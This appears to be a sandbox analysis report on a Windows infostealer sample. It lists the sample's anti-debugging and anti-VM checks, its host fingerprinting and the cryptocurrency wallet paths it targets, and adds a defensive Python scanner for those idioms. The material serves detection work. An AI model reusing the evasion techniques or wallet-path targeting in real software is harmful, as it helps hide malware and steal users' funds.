Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B420 push 0040B44Ch; ret |
0_2_0040B444 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, |
0_2_00417216 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FBD94B9982Ch 0x00000006 rdtsc |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00415E40 GetSystemInfo, |
0_2_00415E40 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW@ |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h] |
0_2_00407AF0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h] |
0_2_0046052B |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h] |
0_2_00460000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h] |
0_2_00460000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h] |
0_2_00460AFD |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h] |
0_2_004606F5 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h] |
0_2_004606F5 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h] |
0_2_004A0000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h] |
0_2_004A0000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h] |
0_2_004A0408 |
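Three of the findings above are plain byte patterns a triage script can look for in an unpacked image without a full disassembler: the "push imm32 ... ret" entries (the pushed address sits a few bytes past the RET, so the RET transfers control forward rather than returning to a caller), the paired RDTSC timing check, and the fs:[30h] reads that fetch the PEB for BeingDebugged and similar checks. The scanner below is an added example for this page, not part of the sandbox report. It works on a constructed byte buffer with an assumed image base, and because it matches bytes rather than decoding instructions, data or immediates can produce false positives; treat hits as leads to confirm in a disassembler.

```python
"""Linear-sweep scan of 32-bit x86 code for three evasion idioms flagged in
this sample: push imm32 / ret control transfers, back-to-back RDTSC timing
checks, and PEB reads through fs:[30h].

Added example, not part of the sandbox report. Byte-pattern heuristic only;
the sample buffer is constructed and the image base is assumed.
"""
from __future__ import annotations

import struct

# ModRM values (mod=00, rm=101 -> disp32) for "mov r32, fs:[disp32]".
PEB_MODRM = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx", 0x35: "esi", 0x3D: "edi"}
FS30 = b"\x30\x00\x00\x00"


def find_peb_reads(code: bytes, base: int) -> list[tuple[int, str]]:
    """64 A1 30 00 00 00 (mov eax, fs:[30h]) or 64 8B /r 30 00 00 00."""
    hits = []
    for i in range(len(code) - 5):
        if code[i] != 0x64:
            continue
        if code[i + 1] == 0xA1 and code[i + 2:i + 6] == FS30:
            hits.append((base + i, "mov eax, fs:[30h]"))
        elif code[i + 1] == 0x8B and code[i + 2] in PEB_MODRM and code[i + 3:i + 7] == FS30:
            hits.append((base + i, f"mov {PEB_MODRM[code[i + 2]]}, fs:[30h]"))
    return hits


def find_rdtsc_pairs(code: bytes, base: int, window: int = 16) -> list[int]:
    """Address of each RDTSC (0F 31) followed by another RDTSC within `window` bytes."""
    hits = []
    pos = code.find(b"\x0f\x31")
    while pos != -1:
        if code.find(b"\x0f\x31", pos + 2, pos + 2 + window) != -1:
            hits.append(base + pos)
        pos = code.find(b"\x0f\x31", pos + 2)
    return hits


def find_push_ret(code: bytes, base: int, max_gap: int = 0x100,
                  max_forward: int = 0x40) -> list[tuple[int, int, int]]:
    """(push_va, ret_va, target) for a push imm32 whose immediate is an in-image
    address just past a following RET, matching the report's 'push X; ret' rows."""
    hits = []
    end = base + len(code)
    for i in range(len(code) - 4):
        if code[i] != 0x68:
            continue
        target = struct.unpack_from("<I", code, i + 1)[0]
        if not base <= target < end:
            continue  # immediate is not a code address in this image
        ret = code.find(b"\xc3", i + 5, i + 5 + max_gap)
        if ret == -1:
            continue
        if base + i < target <= base + ret + max_forward:
            hits.append((base + i, base + ret, target))
    return hits


def scan(code: bytes, base: int) -> dict[str, list]:
    return {
        "rdtsc_pairs": find_rdtsc_pairs(code, base),
        "peb_reads": find_peb_reads(code, base),
        "push_ret": find_push_ret(code, base),
    }


# Constructed sample region (assumed base 0x401000), 48 bytes:
SAMPLE_BASE = 0x401000
SAMPLE_CODE = (
    bytes.fromhex("0f318bd00f312bc27710")           # rdtsc; mov edx,eax; rdtsc; sub eax,edx; jnbe +0x10
    + bytes.fromhex("64a130000000")                 # mov eax, fs:[30h]          (offset 10)
    + bytes.fromhex("648b1d30000000")               # mov ebx, fs:[30h]          (offset 16)
    + b"\x68" + struct.pack("<I", SAMPLE_BASE + 39) # push 0x401027              (offset 23)
    + b"\x90\x90\x90"                               # filler
    + b"\xc3"                                       # ret -> lands at 0x401027   (offset 31)
    + b"\x90" * 8
    + b"\x68" + struct.pack("<I", 0x12345678)       # push of a non-image value  (offset 40)
    + b"\xc3"
    + b"\x90\x90"
)

if __name__ == "__main__":
    for kind, found in scan(SAMPLE_CODE, SAMPLE_BASE).items():
        print(kind, [tuple(hex(x) if isinstance(x, int) else x for x in h)
                     if isinstance(h, tuple) else hex(h) for h in found])
```

The in-image test on the pushed immediate is what keeps ordinary "push constant" sequences out of the push/ret list; on a real unpacked PE, pass the .text section bytes with its mapped virtual address as `base`.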
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00404BA8 GetLocaleInfoA, |
0_2_00404BA8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, |
0_2_00404C71 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004065F0 GetUserNameW, |
0_2_004065F0 |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004186C4 |
0_2_004186C4 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: electrum.dat |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %appdata%\Electrum\wallets\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Jaxx\Local Storage\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Exodus\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %APPDATA%\Ethereum\keystore\ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: %appdata%\Electrum-LTC\wallets\ |